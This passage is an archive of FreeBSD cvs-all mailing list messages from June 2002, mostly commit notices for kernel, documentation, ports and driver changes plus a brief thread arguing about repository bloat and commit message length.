(Postfix) with ESMTP id D155837B403; Tue, 18 Jun 2002 12:37:02 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJb2Q87876; Tue, 18 Jun 2002 12:37:02 -0700 (PDT) (envelope-from dillon) Message-Id: <200206181937.g5IJb2Q87876@freefall.freebsd.org> From: Matt Dillon Date: Tue, 18 Jun 2002 12:37:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_object.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/18 12:37:02 PDT Modified files: (Branch: RELENG_4) sys/vm vm_object.c Log: MFC 1.201 - add a sequential iteration optimization to vm_object_page_clean(). This greatly improves msync() and VM object flushing and greatly improves cpu overheads related to VM object flushing on large objects. Yahoo has been running this patch set since March (and it has also been in -current since March). Revision Changes Path 1.171.2.6 +195 -76 src/sys/vm/vm_object.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:41: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EC51637B40C; Tue, 18 Jun 2002 12:40:55 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJetd88192; Tue, 18 Jun 2002 12:40:55 -0700 (PDT) (envelope-from blackend) Message-Id: <200206181940.g5IJetd88192@freefall.freebsd.org> From: Marc Fonvieille Date: Tue, 18 Jun 2002 12:40:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/sound chapter.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/18 12:40:55 PDT Modified files: en_US.ISO8859-1/books/handbook/sound chapter.sgml Log: Application tags addition for KDE and esound PR: docs/38808 Submitted by: Marc Fonvieille Approved by: keramida Revision Changes Path 1.32 +1 -1 doc/en_US.ISO8859-1/books/handbook/sound/chapter.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:41:52 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 5705737B40C; Tue, 18 Jun 2002 12:41:44 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5IJfiP8005562; Tue, 18 Jun 2002 12:41:44 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5IJfib0005561; Tue, 18 Jun 2002 12:41:44 -0700 (PDT) Date: Tue, 18 Jun 2002 12:41:44 -0700 From: "David O'Brien" To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618124144.A5496@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> <20020618191451.GD37018@leviathan.inethouston.net> <20020618122525.A85448@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020618122525.A85448@xor.obsecurity.org>; from kris@obsecurity.org on Tue, Jun 18, 2002 at 12:25:25PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 18, 2002 at 12:25:25PM -0700, Kris Kennaway wrote: > > > Yay, another 680KB added to the repo for no particular reason. > > > Please, people! > > > > I could see how will's commit could be optomized, but how do you > > optomize this when the commit log was less than 10% of the message? > > "Remove gcc.295, which is no longer used" > 40 bytes instead of 688; a savings of 96% People bitch my commit messages don't say enough, people bitch they are too long, people bitch I editorizie, PEOPLE JUST FRANKLY BITCH I see. Do I never commit again (other than one more to CVSROOT/access), or lay heavy on the 'D' key... one ponders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:42:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D14237B407; Tue, 18 Jun 2002 12:42:37 -0700 (PDT) Received: (from gordon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJgbW88735; Tue, 18 Jun 2002 12:42:37 -0700 (PDT) (envelope-from gordon) Message-Id: <200206181942.g5IJgbW88735@freefall.freebsd.org> From: Gordon Tetlow Date: Tue, 18 Jun 2002 12:42:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/rc.d named X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gordon 2002/06/18 12:42:37 PDT Modified files: etc/rc.d named Log: Fix a typo in the named startup options Submitted by: sheldonh@ Revision Changes Path 1.3 +1 -1 src/etc/rc.d/named To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:46: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 68EF337B41A; Tue, 18 Jun 2002 12:45:42 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJjgs89148; Tue, 18 Jun 2002 12:45:42 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206181945.g5IJjgs89148@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 12:45:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 12:45:42 PDT Modified files: . modules Log: txfonts --> ports/print/txfonts Revision Changes Path 1.5382 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:46: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 756E737B40F; Tue, 18 Jun 2002 12:45:39 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJjd489114; Tue, 18 Jun 2002 12:45:39 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206181945.g5IJjd489114@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 12:45:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/print Makefile ports/print/txfonts Makefile distinfo pkg-comment pkg-descr pkg-message pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 12:45:39 PDT Modified files: print Makefile Added files: print/txfonts Makefile distinfo pkg-comment pkg-descr pkg-message pkg-plist Log: add txfonts 3.1.1 Fontsets includes Adobe Times Roman for TeX users PR: 30979 Submitted by: Koji Mori Revision Changes Path 1.214 +1 -0 ports/print/Makefile 1.1 +391 -0 ports/print/txfonts/Makefile (new) 1.1 +306 -0 ports/print/txfonts/distinfo (new) 1.1 +1 -0 ports/print/txfonts/pkg-comment (new) 1.1 +8 -0 ports/print/txfonts/pkg-descr (new) 1.1 +9 -0 ports/print/txfonts/pkg-message (new) 1.1 +316 -0 ports/print/txfonts/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:53:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 028D037B40A; Tue, 18 Jun 2002 12:53:33 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJrWF90217; Tue, 18 Jun 2002 12:53:32 -0700 (PDT) (envelope-from glewis) Message-Id: <200206181953.g5IJrWF90217@freefall.freebsd.org> From: Greg Lewis Date: Tue, 18 Jun 2002 12:53:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/e16utils/files patch-e16keyedit-0.2 patch-e16menuedit-0.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/18 12:53:32 PDT Modified files: x11-wm/e16utils/files patch-e16keyedit-0.2 patch-e16menuedit-0.1 Log: Unbreak this port by linking against Imlib. This shouldn't be necessary if gdk_imlib was linked against Imlib but this doesn't seem to be the case for our Imlib port. Add $FreeBSD$ to the modified files. Revision Changes Path 1.2 +3 -1 ports/x11-wm/e16utils/files/patch-e16keyedit-0.2 1.2 +3 -1 ports/x11-wm/e16utils/files/patch-e16menuedit-0.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 12:59: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E965737B40A; Tue, 18 Jun 2002 12:59:03 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IJx3b90581; Tue, 18 Jun 2002 12:59:03 -0700 (PDT) (envelope-from glewis) Message-Id: <200206181959.g5IJx3b90581@freefall.freebsd.org> From: Greg Lewis Date: Tue, 18 Jun 2002 12:59:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/e16utils Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/18 12:59:03 PDT Modified files: x11-wm/e16utils Makefile Log: Note to self: Remember to remove BROKEN from Makefile when port is fixed. Revision Changes Path 1.6 +0 -2 ports/x11-wm/e16utils/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13: 2:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 20FF437B40D; Tue, 18 Jun 2002 13:02:32 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IK2WM91380; Tue, 18 Jun 2002 13:02:32 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206182002.g5IK2WM91380@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 13:02:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail Makefile ports/mail/pm-lib Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 13:02:32 PDT Modified files: mail Makefile Added files: mail/pm-lib Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add pm-lib A collection of procmail plug-in modules PR: 32037 Submitted by: Jeremy Norris Revision Changes Path 1.303 +1 -0 ports/mail/Makefile 1.1 +51 -0 ports/mail/pm-lib/Makefile (new) 1.1 +1 -0 ports/mail/pm-lib/distinfo (new) 1.1 +1 -0 ports/mail/pm-lib/pkg-comment (new) 1.1 +4 -0 ports/mail/pm-lib/pkg-descr (new) 1.1 +54 -0 ports/mail/pm-lib/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13: 2:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3E7B637B40E; Tue, 18 Jun 2002 13:02:35 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IK2ZK91411; Tue, 18 Jun 2002 13:02:35 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206182002.g5IK2ZK91411@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 13:02:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 13:02:35 PDT Modified files: . modules Log: pm-lib --> ports/mail/pm-lib Revision Changes Path 1.5383 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:14:49 2002 Delivered-To: cvs-all@freebsd.org Received: from leviathan.inethouston.net (leviathan.inethouston.net [66.64.12.249]) by hub.freebsd.org (Postfix) with ESMTP id AB3D037B407; Tue, 18 Jun 2002 13:14:42 -0700 (PDT) Received: by leviathan.inethouston.net (Postfix, from userid 1001) id 3740A3198D8; Tue, 18 Jun 2002 15:14:41 -0500 (CDT) Date: Tue, 18 Jun 2002 15:14:41 -0500 From: "David W. Chapman Jr." To: Greg Lewis Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, portmgr@freebsd.org Subject: Re: cvs commit: ports/x11-wm/e16utils/files patch-e16keyedit-0.2 patch-e16menuedit-0.1 Message-ID: <20020618201441.GH37018@leviathan.inethouston.net> Reply-To: "David W. Chapman Jr." Mail-Followup-To: Greg Lewis , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, portmgr@freebsd.org References: <200206181953.g5IJrWF90217@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206181953.g5IJrWF90217@freefall.freebsd.org> X-Operating-System: FreeBSD 4.5-STABLE i386 User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 18, 2002 at 12:53:32PM -0700, Greg Lewis wrote: > glewis 2002/06/18 12:53:32 PDT > > Modified files: > x11-wm/e16utils/files patch-e16keyedit-0.2 > patch-e16menuedit-0.1 > Log: > Unbreak this port by linking against Imlib. This shouldn't be necessary > if gdk_imlib was linked against Imlib but this doesn't seem to be the > case for our Imlib port. > > Add $FreeBSD$ to the modified files. I don't know if this is necessary, are we supposed to be doing this? - David W. Chapman Jr. dwcjr@inethouston.net Raintree Network Services, Inc. dwcjr@freebsd.org FreeBSD Committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:32:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A9D737B42F; Tue, 18 Jun 2002 13:32:22 -0700 (PDT) Received: (from tegge@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IKWMb98466; Tue, 18 Jun 2002 13:32:22 -0700 (PDT) (envelope-from tegge) Message-Id: <200206182032.g5IKWMb98466@freefall.freebsd.org> From: Tor Egge Date: Tue, 18 Jun 2002 13:32:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/linuxthreads Makefile pkg-plist ports/devel/linuxthreads/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tegge 2002/06/18 13:32:22 PDT Modified files: devel/linuxthreads Makefile pkg-plist devel/linuxthreads/files patch-aa Log: Register PIC archives when INSTALL_PIC_ARCHIVE has been defined. Defining INSTALL_LIBLTHREAD_PIC_ARCHIVE causes installation and registration of PIC archive for liblthread, which can be used to generate a shared liblthread library for a different gcc installation. Bump port revision. Revision Changes Path 1.29 +14 -1 ports/devel/linuxthreads/Makefile 1.18 +5 -1 ports/devel/linuxthreads/files/patch-aa 1.8 +4 -0 ports/devel/linuxthreads/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:37:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4899737B409; Tue, 18 Jun 2002 13:37:02 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IKb2898787; Tue, 18 Jun 2002 13:37:02 -0700 (PDT) (envelope-from bmah) Message-Id: <200206182037.g5IKb2898787@freefall.freebsd.org> From: "Bruce A. Mah" Date: Tue, 18 Jun 2002 13:37:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/releng index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/18 13:37:02 PDT Modified files: en/releng index.sgml Log: Add knu to the list of portmgr members on the releng page. Submitted by: will Revision Changes Path 1.10 +2 -2 www/en/releng/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:38: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id D710F37B400; Tue, 18 Jun 2002 13:38:01 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 5E65266B95; Tue, 18 Jun 2002 13:38:01 -0700 (PDT) Date: Tue, 18 Jun 2002 13:38:01 -0700 From: Kris Kennaway To: David O'Brien , Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618133801.A87917@xor.obsecurity.org> References: <200206181833.g5IIXqr75460@freefall.freebsd.org> <20020618115146.A82102@xor.obsecurity.org> <20020618123500.A2849@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="k1lZvvs/B4yU6o8G" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020618123500.A2849@dragon.nuxi.com>; from obrien@FreeBSD.org on Tue, Jun 18, 2002 at 12:35:00PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --k1lZvvs/B4yU6o8G Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jun 18, 2002 at 12:35:00PM -0700, David O'Brien wrote: > 1. you've forgotten *.295 will totally disappear soon (as in not even in > the Attic, totally gone as if it never, ever existed). OK, it's still a point other people should remain aware of even if it's not an issue in this case. > 2. in general people seem to not care about repo bloat anymore -- not > when disk sizes are what they are. This is an attitude I'm trying to change. Kris --k1lZvvs/B4yU6o8G Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9D5ooWry0BWjoQKURArYXAKDurS10Hh63SLsxIYA+ESz3xmWEcwCdFtc3 zSx4BYRfFqKlYXwXRyK9eZQ= =IzJF -----END PGP SIGNATURE----- --k1lZvvs/B4yU6o8G-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:40:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A3FA537B411; Tue, 18 Jun 2002 13:40:22 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IKeMj99151; Tue, 18 Jun 2002 13:40:22 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206182040.g5IKeMj99151@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 13:40:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 13:40:22 PDT Modified files: . modules Log: kprof --> ports/devel/kprof Revision Changes Path 1.5384 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:40:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E737037B40D; Tue, 18 Jun 2002 13:40:18 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IKeIu99119; Tue, 18 Jun 2002 13:40:18 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206182040.g5IKeIu99119@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 13:40:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel Makefile ports/devel/kprof Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 13:40:18 PDT Modified files: devel Makefile Added files: devel/kprof Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add kprof 1.3 A profiling tool for KDE. PR: 33135 Submitted by: Paul Marquis Revision Changes Path 1.849 +1 -0 ports/devel/Makefile 1.1 +28 -0 ports/devel/kprof/Makefile (new) 1.1 +1 -0 ports/devel/kprof/distinfo (new) 1.1 +1 -0 ports/devel/kprof/pkg-comment (new) 1.1 +12 -0 ports/devel/kprof/pkg-descr (new) 1.1 +10 -0 ports/devel/kprof/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 13:42:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AB3B37B412; Tue, 18 Jun 2002 13:41:32 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IKfWw99824; Tue, 18 Jun 2002 13:41:32 -0700 (PDT) (envelope-from bmah) Message-Id: <200206182041.g5IKfWw99824@freefall.freebsd.org> From: "Bruce A. Mah" Date: Tue, 18 Jun 2002 13:41:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/releng index.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/18 13:41:32 PDT Modified files: en/releng index.sgml Log: 4.6 is done, so take it off the releng schedule. Bump the 5.0-DP2 date back to mid-July...it will probably slide either forward or backward a little bit. Revision Changes Path 1.11 +2 -4 www/en/releng/index.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14: 1: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 473E737B407; Tue, 18 Jun 2002 14:00:58 -0700 (PDT) Received: (from pdeuskar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IL0wZ02198; Tue, 18 Jun 2002 14:00:58 -0700 (PDT) (envelope-from pdeuskar) Message-Id: <200206182100.g5IL0wZ02198@freefall.freebsd.org> From: Prafulla Deuskar Date: Tue, 18 Jun 2002 14:00:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files.i386 files.pc98 src/sys/dev/em README if_em.c if_em.h if_em_hw.c if_em_hw.h if_em_osdep.h src/sys/modules/em Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pdeuskar 2002/06/18 14:00:57 PDT Modified files: (Branch: RELENG_4) sys/conf files.i386 files.pc98 sys/dev/em if_em.c if_em.h if_em_osdep.h sys/modules/em Makefile Added files: (Branch: RELENG_4) sys/dev/em README if_em_hw.c if_em_hw.h Log: Added support for 82545EM and 82546EB based adapters. Added Vlan support. Added new reference and removed reference to unneeded files from conf files. Revision Changes Path 1.307.2.31 +1 -2 src/sys/conf/files.i386 1.140.2.37 +1 -2 src/sys/conf/files.pc98 1.1.2.1 +281 -0 src/sys/dev/em/README (new) 1.2.2.5 +1730 -1604 src/sys/dev/em/if_em.c 1.1.2.5 +90 -87 src/sys/dev/em/if_em.h 1.1.2.1 +3281 -0 src/sys/dev/em/if_em_hw.c (new) 1.1.2.1 +1756 -0 src/sys/dev/em/if_em_hw.h (new) 1.1.2.4 +13 -13 src/sys/dev/em/if_em_osdep.h 1.1.2.3 +5 -6 src/sys/modules/em/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 14: 6:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AE31037B405; Tue, 18 Jun 2002 14:06:19 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IL6J210384; Tue, 18 Jun 2002 14:06:19 -0700 (PDT) (envelope-from bmah) Message-Id: <200206182106.g5IL6J210384@freefall.freebsd.org> From: "Bruce A. Mah" Date: Tue, 18 Jun 2002 14:06:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org 